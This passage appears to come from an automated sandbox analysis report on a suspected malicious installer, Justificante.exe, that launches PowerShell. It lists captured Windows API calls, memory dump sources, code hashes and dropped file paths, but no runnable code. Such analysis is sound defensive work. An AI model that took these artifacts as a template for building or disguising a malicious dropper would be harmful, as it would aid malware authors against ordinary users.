                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                          • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
                          • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                          • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
                          APIs
                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                            • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: File$Pointer$ByteCharMultiWide$Read
                          • String ID: 9
                          • API String ID: 163830602-2366072709
                          • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                          • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
                          • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                          • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                          APIs
                          • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
                          • GetTickCount.KERNEL32 ref: 00402FFF
                          • wsprintfW.USER32 ref: 0040302D
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                            • Part of subcall function 004055A4: lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                            • Part of subcall function 004055A4: SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                          • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00403051
                          • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                            • Part of subcall function 00402FAA: MulDiv.KERNEL32(00058721,00000064,0005ACD7), ref: 00402FBF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 722711167-2449383134
                          • Opcode ID: b05c67c46c87e700010054eae8e6e792e551e7c7e0ae3dcdbe65f70a63b6779b
                          • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
                          • Opcode Fuzzy Hash: b05c67c46c87e700010054eae8e6e792e551e7c7e0ae3dcdbe65f70a63b6779b
                          • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
                          • GetMessagePos.USER32 ref: 00404E70
                          • ScreenToClient.USER32(?,?), ref: 00404E8A
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                          • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                          • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                          • wsprintfW.USER32 ref: 00402F7D
                          • SetWindowTextW.USER32(?,?), ref: 00402F8D
                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402F9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                          • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
                          • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                          • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                          • GlobalFree.KERNEL32(?), ref: 004029F0
                          • GlobalFree.KERNEL32(00000000), ref: 00402A03
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                          • String ID:
                          • API String ID: 2667972263-0
                          • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                          • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
                          • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                          • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
                          APIs
                          • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                          • wsprintfW.USER32 ref: 00404DE9
                          • SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s$H7B
                          • API String ID: 3540041739-107966168
                          • Opcode ID: afb352a5ceb1d4586ea2fc8411844f54738b02514fb4fb2e587bb31c0291c273
                          • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
                          • Opcode Fuzzy Hash: afb352a5ceb1d4586ea2fc8411844f54738b02514fb4fb2e587bb31c0291c273
                          • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00401D9A
                          • GetClientRect.USER32(?,?), ref: 00401DE5
                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                          • DeleteObject.GDI32(00000000), ref: 00401E39
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          APIs
                          • GetDC.USER32(?), ref: 00401E51
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                          • ReleaseDC.USER32(?,00000000), ref: 00401E84
                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectRelease
                          • String ID:
                          • API String ID: 3808545654-0
                          APIs
                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                          Strings
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          APIs
                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
                          • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405E33
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-297319885
                          APIs
                          • lstrlenA.KERNEL32(C:\Windows\baksendes), ref: 0040268D
                          Strings
                          Similarity
                          • API ID: lstrlen
                          • String ID: C:\ProgramData\bestializing\slagtehuset.spo$C:\Windows\baksendes
                          • API String ID: 1659193697-2972711647
                          APIs
                          • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
                          • CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
                          • C:\Users\user\AppData\Local\Temp\nsf81A1.tmp, xrefs: 00403B4F
                          Similarity
                          • API ID: CloseHandle
                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf81A1.tmp
                          • API String ID: 2962429428-1072142492
                          APIs
                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante.exe,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00405E63
                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante.exe,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00405E73
                          Strings
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-2743851969
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBF
                          • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
                          • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: affe3a7d3c0ad269e74e08f55d9fe4a334a5cf3f70288906a2e7ff84312db232
                          • Instruction ID: 65f03a7a599663a9ea660354130fd1be2e8617c6cb4164c616a41dc17ad4c769
                          • Opcode Fuzzy Hash: affe3a7d3c0ad269e74e08f55d9fe4a334a5cf3f70288906a2e7ff84312db232
                          • Instruction Fuzzy Hash: A50370B0A00218DFE764DB58C850F9EB7B2AF89344F1085E9D50AAB744DB75EE81CF91
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47e91d9c8fab2ecd88dad7dbfb49ce22f0562846f71614c4082e63f9bde13a05
                          • Instruction ID: cb158d47b4f8b92165a595ccf1aaabc64573cd727260dcda734d342732210779
                          • Opcode Fuzzy Hash: 47e91d9c8fab2ecd88dad7dbfb49ce22f0562846f71614c4082e63f9bde13a05
                          • Instruction Fuzzy Hash: A00149B2B243614BE32163B88841BAD77639FC7650F1445AAC9125F381DE74EC4683D3
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7ece74ada4d292990254e54874b84b6ab70383a21b1a625ad0f54b348b6fa712
                          • Instruction ID: cd6661eb8d0136519bb86158ed37520b9eddcd7cf1ab07e5cec5d8778653a6d8
                          • Opcode Fuzzy Hash: 7ece74ada4d292990254e54874b84b6ab70383a21b1a625ad0f54b348b6fa712
                          • Instruction Fuzzy Hash: 09C2A1B0A00318DFE764DB68C850B9EB7B2EF88344F1085A9D81A6B745DB75ED81CF91
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e29f03dfa92bdbd130c7ac66ce80e0dda86a1a0718a8f863de3580aae089a53
                          • Instruction ID: badc14b025a66cb348bff2d614da7c18bd4b5f1c65b6ca27802725cc422c0cd9
                          • Opcode Fuzzy Hash: 5e29f03dfa92bdbd130c7ac66ce80e0dda86a1a0718a8f863de3580aae089a53
                          • Instruction Fuzzy Hash: 1FA2D2B4A00254DFD764DB98C850BAEF7F2AF85340F10C5AAD55AAB340DB75EC81CB61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e69e46d5897646cf311a2f042264db9a10f5ef453ea00a26315043517edd5087
                          • Instruction ID: 5767acec69aa2f4721386b9516e1145a9b5099445712fcc1605d6f16da3ebccc
                          • Opcode Fuzzy Hash: e69e46d5897646cf311a2f042264db9a10f5ef453ea00a26315043517edd5087
                          • Instruction Fuzzy Hash: C4929DB0B00344DFD754CB98C854BA9B7B2BF85344F25816AE909AF385DBB6EC81CB51
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cbc3537eb0e012d00eb4e960acb0b88440201a1d2d4b24ed0b6d917b34c38652
                          • Instruction ID: 39eacad0ab64280488b6841ac124a947bcb1691e16188660606125ef413af6d0
                          • Opcode Fuzzy Hash: cbc3537eb0e012d00eb4e960acb0b88440201a1d2d4b24ed0b6d917b34c38652
                          • Instruction Fuzzy Hash: 6282D3B4A00254DFE764CB98C850FAEB3B2AF84340F10C5A9D95A6B741DBB5ED81CF61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b7291bca82439a01dc4e4952db5382867b7ae4beb4655bd98ead94f4e07a647
                          • Instruction ID: fdad8acced195d92e1a1e1a2bb36c64e7d6ba78ba778aaffa0d6e84ab5442ccb
                          • Opcode Fuzzy Hash: 2b7291bca82439a01dc4e4952db5382867b7ae4beb4655bd98ead94f4e07a647
                          • Instruction Fuzzy Hash: 28729CB4A00254DFEB60CB98C850BAEF7B2AF84344F10C5AAD55A6B740DB75ED81CF61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af1f72e3df7a7687c0e6ad3b60fab63f18cea91dd40fb0aeb62afa185a0fcff3
                          • Instruction ID: dba011ffc0fbe4a3c79ff3dc87c877870e022b41372ba04374deae4cdf5ea464
                          • Opcode Fuzzy Hash: af1f72e3df7a7687c0e6ad3b60fab63f18cea91dd40fb0aeb62afa185a0fcff3
                          • Instruction Fuzzy Hash: FB729CB4A00254DFEB60CB98C850BAEF7B2AF84344F10C5AAD55A6B740DB75ED81CF61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96a61db0f0f7df4654eaf1b1749155d5110657d32f6d720de2d5424b25e4d979
                          • Instruction ID: 8cef58214db49d01ca3ad84b18847d1476b02dac76010ffaf23a4b489a377257
                          • Opcode Fuzzy Hash: 96a61db0f0f7df4654eaf1b1749155d5110657d32f6d720de2d5424b25e4d979
                          • Instruction Fuzzy Hash: EF52CFB4A00254DFE720DB58C850FAEB7B2AF84344F10C5AAD95A6B740DBB5ED81CF61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 969ce4e3badb4ac54c288226daa67c1b963276dbdd1543dcea66766bad4bb92a
                          • Instruction ID: dcd0dc34e2d10acf31f12dc7792169db348da39dcc37f4b8d87b0f9ec8f902b2
                          • Opcode Fuzzy Hash: 969ce4e3badb4ac54c288226daa67c1b963276dbdd1543dcea66766bad4bb92a
                          • Instruction Fuzzy Hash: 8A329EB0B00248AFDB54CB98C440BAEB7F2AF89714F14C569E905AF391DB76ED41CB91
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c84f0d2ee91827d88a7febc84d4f8517f3d34fa5c55992105f6da84d2fb97cac
                          • Instruction ID: 1b3e1f565280513d9506947a6c7f08a1981686e2e9d00cc71e41ac17a6f8266e
                          • Opcode Fuzzy Hash: c84f0d2ee91827d88a7febc84d4f8517f3d34fa5c55992105f6da84d2fb97cac
                          • Instruction Fuzzy Hash: 19124DB0A00215DFEB60DB58C890FAEB7B2AF45344F0085EAD51AAB744DB75EE81CF51
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41f1b4fc032816220dcf8119924609ea0cfb5ca89ed6f1ca77a37c000ea510a7
                          • Instruction ID: 0a670ef8efde163635e078c9e2d29356a8cbea6b764fe24dabab344ed484534b
                          • Opcode Fuzzy Hash: 41f1b4fc032816220dcf8119924609ea0cfb5ca89ed6f1ca77a37c000ea510a7
                          • Instruction Fuzzy Hash: EF123CB0A00215DFEB60DB58C890FAEB7B2AF45344F0085E9E51AAB744DB75EE81CF51
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2dc2197665f12084b55a84daea6d6c79f4f5ab6fc386af26ce29d7c13c29a01a
                          • Instruction ID: b0a031ad4aaf87b4ca4daaf14928d1590c7e38b96d74fb8dcc019566ce58f883
